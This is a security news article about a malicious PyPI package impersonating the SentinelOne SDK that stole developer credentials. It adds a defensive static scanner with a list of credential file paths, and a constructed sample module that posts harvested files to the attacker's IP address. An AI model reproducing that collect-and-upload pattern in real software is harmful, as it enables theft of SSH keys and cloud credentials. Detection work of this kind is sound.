  • SentinelOne collects sensitive developer data


    Attackers published a malicious Python package called SentinelOne on PyPI. It poses as a legitimate SDK client for the American information security company SentinelOne, but in fact steals data from developers.

    The package provides the expected functionality that makes it easy to access the SentinelOne API from another project. However, this package has been trojanized to steal sensitive data from compromised developer systems.

    The attack was discovered by ReversingLabs researchers, who reported the SentinelOne package to PyPI. The malicious package has since been removed. It was first uploaded to PyPI on December 11, 2022 and was updated 20 times after that.

    According to the researchers, the package is a copy of the real SentinelOne SDK client, which the attacker then modified to add and refine malicious functionality.

    The fake SentinelOne package contains "api.py" files with malicious code that steals and uploads data to an IP address (54.254.189.27) that does not belong to the SentinelOne infrastructure.

    This malicious code acts as malware to steal various developer data from all home directories on the device. The following information is collected:

    • Bash and Zsh histories;
    • SSH keys;
    • ".gitconfig" files;
    • hosts files;
    • AWS configuration information;
    • Kube configuration information.

    These locations usually contain authentication tokens, sensitive information, and API keys. According to experts, the cybercriminal is deliberately targeting development environments in order to gain further access to their cloud services and servers.
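    The combination the article describes, code that reads credential files out of every home directory and also uploads to a hardcoded IP address, is exactly the shape a package reviewer can look for before installing a third-party SDK. The following static scanner is an added example, not code from the article, from ReversingLabs or from SentinelOne: it takes the source files of an unpacked package, flags references to the artifacts listed above, hardcoded IPv4 literals, home-directory enumeration and upload calls, and rates a file "high" only when collection and an outbound path occur together. The sample package, the placeholder tenant URL and the module layout are constructed for the test; the IP address is the one quoted in the article.

```python
import re

# Artifacts the trojanized package harvested, as listed in the article. Any of
# these in a package that claims to be a vendor SDK client deserves a look.
SENSITIVE_PATH_MARKERS = (
    ".bash_history", ".zsh_history", ".ssh/", ".gitconfig",
    "/etc/hosts", ".aws/", ".kube/",
)

# A genuine SDK talks to the vendor's hostname; a literal IPv4 address in a URL
# is unusual and, in the article's case, pointed outside the vendor's infrastructure.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Code that enumerates home directories rather than its own config location.
HOME_DIR_RE = re.compile(r"expanduser\(|/home/\*|/Users/\*|os\.environ\[\s*['\"]HOME['\"]\s*\]")
# Outbound calls that can carry a payload (uploads rather than plain API reads).
NETWORK_SEND_RE = re.compile(r"\brequests\.(?:post|put)\b|\burlopen\(|\bsocket\.connect\b")


def scan_file(path, source):
    """Static heuristics over one source file; returns a findings record."""
    paths = sorted({m for m in SENSITIVE_PATH_MARKERS if m in source})
    ips = sorted(set(IPV4_RE.findall(source)))
    collects = bool(paths) and bool(HOME_DIR_RE.search(source))
    sends = bool(NETWORK_SEND_RE.search(source)) or bool(ips)
    if collects and sends:
        severity = "high"     # credential collection and an upload path together
    elif paths or ips:
        severity = "medium"   # one half of the pattern; worth a manual review
    else:
        severity = "low"
    return {"file": path, "sensitive_paths": paths, "hardcoded_ips": ips,
            "collects_home_dirs": collects, "sends": sends, "severity": severity}


def scan_package(files):
    """files: {relative path: source text}, e.g. read from an unpacked sdist or wheel."""
    return [scan_file(p, src) for p, src in sorted(files.items())]


def suspicious_files(files):
    """Names of files that show both collection and an outbound path."""
    return [r["file"] for r in scan_package(files) if r["severity"] == "high"]


# Constructed sample package (hypothetical layout, not the real package's code):
# a plausible SDK module next to a file with the collect-and-upload shape the
# article describes. The strings are only scanned, never executed.
SAMPLE_PACKAGE = {
    "sentinelone/client.py": '''
import requests
BASE_URL = "https://management.example.com/web/api/v2.1"   # placeholder tenant URL
def list_agents(token):
    return requests.get(BASE_URL + "/agents",
                        headers={"Authorization": "ApiToken " + token})
''',
    "sentinelone/api.py": '''
import glob, os, requests
COLLECT = [".bash_history", ".zsh_history", ".ssh/", ".gitconfig", ".aws/", ".kube/"]
HOMES = glob.glob("/home/*") + [os.path.expanduser("~")]
UPLOAD = "http://54.254.189.27/"     # address quoted in the article, outside vendor infra
def run(payload):
    payload["hosts"] = "/etc/hosts"
    requests.post(UPLOAD, files=payload)
''',
}

if __name__ == "__main__":
    for record in scan_package(SAMPLE_PACKAGE):
        print(record)
```

    Run against a real download with `pip download --no-deps --no-binary :all: <name>` followed by unpacking the archive and feeding each `.py` file into `scan_package`; the heuristics are deliberately coarse, so treat "medium" as a prompt to read the file, not as a verdict.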

    ReversingLabs reports that between December 8 and 11, 2022, the same authors uploaded 5 more packages with the same names. However, these packages did not contain "api.py" files, so they were probably used for testing purposes.

    All published versions of the information-stealing package together were downloaded over 1000 times from PyPI. From the evidence collected, ReversingLabs researchers were unable to determine whether the package was used in actual attacks.

    Author DeepWeb
